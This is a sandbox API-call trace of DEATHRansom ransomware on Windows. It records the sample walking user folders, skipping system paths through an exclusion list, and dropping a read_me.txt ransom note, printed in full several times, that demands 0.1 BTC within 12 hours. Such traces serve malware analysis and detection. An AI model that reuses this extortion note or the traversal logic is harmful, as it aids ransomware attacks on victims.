[0076.119] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.119] WriteFile (in: hFile=0x8fc, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.119] CloseHandle (hObject=0x8fc) returned 1 [0076.120] GetProcessHeap () returned 0x4f10000 [0076.120] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b300a0 | out: hHeap=0x4f10000) returned 1 [0076.120] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0076.120] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned 42 [0076.120] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0076.120] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0076.120] StrStrW (lpFirst="my pictures", lpSrch="programdata") returned 0x0 [0076.120] StrStrW (lpFirst="my pictures", lpSrch="$recycle.bin") returned 0x0 [0076.120] StrStrW (lpFirst="my pictures", lpSrch="program files") returned 0x0 [0076.120] StrStrW (lpFirst="my pictures", lpSrch="windows") returned 0x0 [0076.120] StrStrW (lpFirst="my pictures", lpSrch="all users") returned 0x0 [0076.120] StrStrW (lpFirst="my pictures", lpSrch="appdata") returned 0x0 [0076.120] GetProcessHeap () returned 0x4f10000 [0076.120] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c60028 [0076.120] lstrcpyW (in: lpString1=0x8c60028, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" [0076.120] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 101 [0076.120] QueueUserWorkItem (Function=0x40a710, Context=0x8c60028, Flags=0x0) returned 1 [0076.120] GetProcessHeap () returned 0x4f10000 [0076.120] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b300a0 [0076.120] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned 44 [0076.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qwCPYTNwoNJY0y眕耚眵?\x17Ǭӱ眕耪眵擸ߗƜӱ", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.120] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\read_me.txt") returned 54 [0076.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\read_me.txt" (normalized: "c:\\users\\default\\documents\\my pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f8 [0076.129] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.129] WriteFile (in: hFile=0x8f8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.130] CloseHandle (hObject=0x8f8) returned 1 [0076.130] GetProcessHeap () returned 0x4f10000 [0076.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b300a0 | out: hHeap=0x4f10000) returned 1 [0076.130] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0076.130] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned 40 [0076.130] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0076.130] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0076.130] StrStrW (lpFirst="my videos", lpSrch="programdata") returned 0x0 [0076.130] StrStrW (lpFirst="my videos", lpSrch="$recycle.bin") returned 0x0 [0076.130] StrStrW (lpFirst="my videos", lpSrch="program files") returned 0x0 [0076.130] StrStrW (lpFirst="my videos", lpSrch="windows") returned 0x0 [0076.130] StrStrW (lpFirst="my videos", lpSrch="all users") returned 0x0 [0076.130] StrStrW (lpFirst="my videos", lpSrch="appdata") returned 0x0 [0076.130] GetProcessHeap () returned 0x4f10000 [0076.130] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b300a0 [0076.130] lstrcpyW (in: lpString1=0x8b300a0, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" [0076.130] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 102 [0076.130] QueueUserWorkItem (Function=0x40a710, Context=0x8b300a0, Flags=0x0) returned 1 [0076.130] GetProcessHeap () returned 0x4f10000 [0076.130] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c91058 [0076.130] wnsprintfW (in: pszDest=0x8c91058, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned 42 [0076.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qwCPYTNwoNJY0y眕耚眵?\x17Ǭӱ眕耪眵擸ߗƜӱ", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.130] wnsprintfW (in: pszDest=0x8c91058, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\read_me.txt") returned 52 [0076.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\read_me.txt" (normalized: "c:\\users\\default\\documents\\my videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f8 [0076.131] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.131] WriteFile (in: hFile=0x8f8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.132] CloseHandle (hObject=0x8f8) returned 1 [0076.132] GetProcessHeap () returned 0x4f10000 [0076.132] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c91058 | out: hHeap=0x4f10000) returned 1 [0076.132] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="my videos", cAlternateFileName="MYVIDE~1")) returned 0 [0076.132] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.133] wnsprintfW (in: pszDest=0x8c40018, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\read_me.txt") returned 42 [0076.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\read_me.txt" (normalized: "c:\\users\\default\\documents\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.134] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.134] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.135] CloseHandle (hObject=0x79c) returned 1 [0076.135] GetProcessHeap () returned 0x4f10000 [0076.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c40018 | out: hHeap=0x4f10000) returned 1 [0076.135] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0076.135] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads") returned 30 [0076.135] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0076.135] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0076.135] StrStrW (lpFirst="downloads", lpSrch="programdata") returned 0x0 [0076.135] StrStrW (lpFirst="downloads", lpSrch="$recycle.bin") returned 0x0 [0076.135] StrStrW (lpFirst="downloads", lpSrch="program files") returned 0x0 [0076.135] StrStrW (lpFirst="downloads", lpSrch="windows") returned 0x0 [0076.135] StrStrW (lpFirst="downloads", lpSrch="all users") returned 0x0 [0076.135] StrStrW (lpFirst="downloads", lpSrch="appdata") returned 0x0 [0076.135] GetProcessHeap () returned 0x4f10000 [0076.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c40018 [0076.135] lstrcpyW (in: lpString1=0x8c40018, lpString2="\\\\?\\C:\\Users\\Default\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads") returned="\\\\?\\C:\\Users\\Default\\Downloads" [0076.135] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 103 [0076.135] QueueUserWorkItem (Function=0x40a710, Context=0x8c40018, Flags=0x0) returned 1 [0076.135] GetProcessHeap () returned 0x4f10000 [0076.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c90050 [0076.135] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\*") returned 32 [0076.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.136] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\.") returned 32 [0076.136] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.136] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.136] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.136] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\..") returned 33 [0076.136] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.136] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.136] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0076.136] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.136] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.136] wnsprintfW (in: pszDest=0x8c90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\read_me.txt") returned 42 [0076.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\read_me.txt" (normalized: "c:\\users\\default\\downloads\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0076.136] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.136] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.137] 